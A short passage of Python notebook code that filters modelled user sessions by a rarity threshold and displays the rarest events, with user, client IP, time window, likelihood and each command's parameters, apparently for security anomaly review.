    modelled_df[modelled_df["rarity"] > threshold.value]
    [[
        "UserId", "ClientIP", "begin", "end", "param_value_session", "rarest_window3_likelihood"
    ]]
    .rename(columns={"rarest_window3_likelihood": "likelihood"})
    .sort_values("likelihood")
)
for idx, (_, rarest_event) in enumerate(rarest_events.iterrows(), 1):
    md(f"Event {idx}", "large")
    display(pd.DataFrame(rarest_event[["UserId", "ClientIP", "begin", "end", "likelihood"]]))

    md("<hr>")
    md("Param session details:", "bold")
    for cmd in rarest_event.param_value_session:
        md(f"Command: {cmd.name}")
        md(pprint.pformat(cmd.params))
    md("<hr><br>")